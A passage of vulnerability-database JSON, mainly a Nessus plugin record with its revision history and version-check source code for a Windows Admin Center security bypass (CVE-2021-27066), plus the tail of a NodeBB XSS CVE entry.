"cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "immutableFields": []}], "nessus": [{"id": "WINDOWS_ADMIN_CENTER_MS21_MAR.NASL", "hash": "c355d8f7b6b4e896953c833561e205f1", "type": "nessus", "bulletinFamily": "scanner", "title": "Security Update for Microsoft Windows Admin Center (March 2021)", "description": "The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is, therefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to bypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-10T00:00:00", "modified": "2021-03-11T00:00:00", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 4.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147420", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27066", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066", "http://www.nessus.org/u?0fbee7f5"], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-08-19T12:05:11", "history": [{"bulletin": {"id": "WINDOWS_ADMIN_CENTER_MS21_MAR.NASL", "hash": "3a96c3029b47fb2173d9b7e8499e6b83756efa748e1d40149acd70f802f5b1ad", "type": "nessus", "bulletinFamily": "scanner", "title": "Security Update for Microsoft Windows Admin Center (March 2021)", "description": "The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is,\ntherefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to\nbypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-10T00:00:00", "modified": "2021-03-10T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 4.3, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147420", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?0fbee7f5", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066"], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-03-11T08:21:40", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"modified": "2021-03-11T08:21:40", "references": [{"idList": ["MS:CVE-2021-27066"], "type": "mscve"}, {"idList": ["CVE-2021-27066"], "type": "cve"}, {"idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"], "type": "rapid7blog"}], "rev": 2}, "score": {"modified": "2021-03-11T08:21:40", "rev": 2, "value": 5.4, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147420", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147420);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/10\");\n\n script_cve_id(\"CVE-2021-27066\");\n\n script_name(english:\"Security Update for Microsoft Windows Admin Center (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is contains an application that is affected by a security feature bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is,\ntherefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to\nbypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066\");\n # https://techcommunity.microsoft.com/t5/windows-admin-center-blog/windows-admin-center-version-2103-is-now-generally-available/ba-p/2176438\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fbee7f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate update referenced in the Microsoft advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27066\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_admin_center\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"windows_admin_center_installed.nbin\");\n script_require_keys(\"installed_sw/Windows Admin Center\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Windows Admin Center';\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'fixed_version' : '1.3.2103.1006' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:microsoft:windows_admin_center"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-11T08:21:40", "differentElements": ["sourceData"], "edition": 1}, {"bulletin": {"id": "WINDOWS_ADMIN_CENTER_MS21_MAR.NASL", "hash": "22c40855bcd624c7216abc902527964f29c465e67ad383ec1aa4154a1d13ed8d", "type": "nessus", "bulletinFamily": "scanner", "title": "Security Update for Microsoft Windows Admin Center (March 2021)", "description": "The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is,\ntherefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to\nbypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-10T00:00:00", "modified": "2021-03-10T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 4.3, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147420", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?0fbee7f5", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066"], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-03-12T23:59:32", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"modified": "2021-03-12T23:59:32", "references": [{"idList": ["MS:CVE-2021-27066"], "type": "mscve"}, {"idList": ["CVE-2021-27066"], "type": "cve"}, {"idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"], "type": "rapid7blog"}], "rev": 2}, "score": {"modified": "2021-03-12T23:59:32", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147420", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147420);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/11\");\n\n script_cve_id(\"CVE-2021-27066\");\n\n script_name(english:\"Security Update for Microsoft Windows Admin Center (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is contains an application that is affected by a security feature bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is,\ntherefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to\nbypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066\");\n # https://techcommunity.microsoft.com/t5/windows-admin-center-blog/windows-admin-center-version-2103-is-now-generally-available/ba-p/2176438\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fbee7f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate update referenced in the Microsoft advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27066\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_admin_center\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"windows_admin_center_installed.nbin\");\n script_require_keys(\"installed_sw/Windows Admin Center\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Windows Admin Center';\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'fixed_version' : '1.3.2103.1006' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:microsoft:windows_admin_center"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-12T23:59:32", "differentElements": ["cvss2", "cvss3"], "edition": 2}, {"bulletin": {"id": "WINDOWS_ADMIN_CENTER_MS21_MAR.NASL", "hash": "84c160820d62710fd66a4e317178bf58", "type": "nessus", "bulletinFamily": "scanner", "title": "Security Update for Microsoft Windows Admin Center (March 2021)", "description": "The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is,\ntherefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to\nbypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-03-10T00:00:00", "modified": "2021-03-10T00:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://www.tenable.com/plugins/nessus/147420", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?0fbee7f5", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066"], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-07-29T22:24:18", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "mscve", "idList": ["MS:CVE-2021-27066"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-07-29T22:24:18", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-07-29T22:24:18", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147420", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147420);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/11\");\n\n script_cve_id(\"CVE-2021-27066\");\n\n script_name(english:\"Security Update for Microsoft Windows Admin Center (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is contains an application that is affected by a security feature bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is,\ntherefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to\nbypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066\");\n # https://techcommunity.microsoft.com/t5/windows-admin-center-blog/windows-admin-center-version-2103-is-now-generally-available/ba-p/2176438\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fbee7f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate update referenced in the Microsoft advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27066\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_admin_center\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"windows_admin_center_installed.nbin\");\n script_require_keys(\"installed_sw/Windows Admin Center\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Windows Admin Center';\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'fixed_version' : '1.3.2103.1006' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:microsoft:windows_admin_center"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T22:24:18", "differentElements": ["cpe", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitEase", "modified", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 3}, {"bulletin": {"id": "WINDOWS_ADMIN_CENTER_MS21_MAR.NASL", "hash": "3fa28aff47b79b83c2b212ffe100c476", "type": "nessus", "bulletinFamily": "scanner", "title": "Security Update for Microsoft Windows Admin Center (March 2021)", "description": "The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is, therefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to bypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-10T00:00:00", "modified": "2021-03-11T00:00:00", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 4.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147420", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27066", "http://www.nessus.org/u?0fbee7f5"], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-08-05T12:49:59", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "mscve", "idList": ["MS:CVE-2021-27066"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-08-05T12:49:59", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-05T12:49:59", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147420", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147420);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/11\");\n\n script_cve_id(\"CVE-2021-27066\");\n\n script_name(english:\"Security Update for Microsoft Windows Admin Center (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is contains an application that is affected by a security feature bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is,\ntherefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to\nbypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066\");\n # https://techcommunity.microsoft.com/t5/windows-admin-center-blog/windows-admin-center-version-2103-is-now-generally-available/ba-p/2176438\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fbee7f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate update referenced in the Microsoft advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27066\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_admin_center\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"windows_admin_center_installed.nbin\");\n script_require_keys(\"installed_sw/Windows Admin Center\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Windows Admin Center';\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'fixed_version' : '1.3.2103.1006' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": [], "solution": "Apply the appropriate update referenced in the Microsoft advisory.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-27066", "vpr": {"risk factor": "Low", "score": "1.4"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-02T00:00:00", "vulnerabilityPublicationDate": "2021-03-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T12:49:59", "differentElements": ["cpe"], "edition": 4}, {"bulletin": {"id": "WINDOWS_ADMIN_CENTER_MS21_MAR.NASL", "hash": "137141fde7728ad1deb10ee087e75a87", "type": "nessus", "bulletinFamily": "scanner", "title": "Security Update for Microsoft Windows Admin Center (March 2021)", "description": "The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is, therefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to bypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-03-10T00:00:00", "modified": "2021-03-11T00:00:00", "cvss": {"score": 4, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 4.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/147420", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?0fbee7f5", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27066", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066"], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-08-06T13:25:35", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "mscve", "idList": ["MS:CVE-2021-27066"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-08-06T13:25:35", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-06T13:25:35", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147420", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147420);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/11\");\n\n script_cve_id(\"CVE-2021-27066\");\n\n script_name(english:\"Security Update for Microsoft Windows Admin Center (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is contains an application that is affected by a security feature bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is,\ntherefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to\nbypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066\");\n # https://techcommunity.microsoft.com/t5/windows-admin-center-blog/windows-admin-center-version-2103-is-now-generally-available/ba-p/2176438\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fbee7f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate update referenced in the Microsoft advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27066\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:windows_admin_center\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"windows_admin_center_installed.nbin\");\n script_require_keys(\"installed_sw/Windows Admin Center\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Windows Admin Center';\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'fixed_version' : '1.3.2103.1006' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:microsoft:windows_admin_center"], "solution": "Apply the appropriate update referenced in the Microsoft advisory.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-27066", "vpr": {"risk factor": "Low", "score": "1.4"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-03-02T00:00:00", "vulnerabilityPublicationDate": "2021-03-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-06T13:25:35", "differentElements": ["nessusSeverity"], "edition": 5}], "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "mscve", "idList": ["MS:CVE-2021-27066"]}, {"type": "kaspersky", "idList": ["KLA12111"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-08-19T12:05:11", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-19T12:05:11", "rev": 2}}, "objectVersion": "1.6", "pluginID": "147420", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147420);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/11\");\n\n script_cve_id(\"CVE-2021-27066\");\n\n script_name(english:\"Security Update for Microsoft Windows Admin Center (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is contains an application that is affected by a security feature bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is running a version of Microsoft Windows Admin Center that is missing a security update. It is,\ntherefore, affected by a security feature bypass vulnerability. An authenticated, remote attacker can exploit this to\nbypass security features.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27066\");\n # https://techcommunity.microsoft.com/t5/windows-admin-center-blog/windows-admin-center-version-2103-is-now-generally-available/ba-p/2176438\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fbee7f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate update referenced in the Microsoft advisory.\");\n 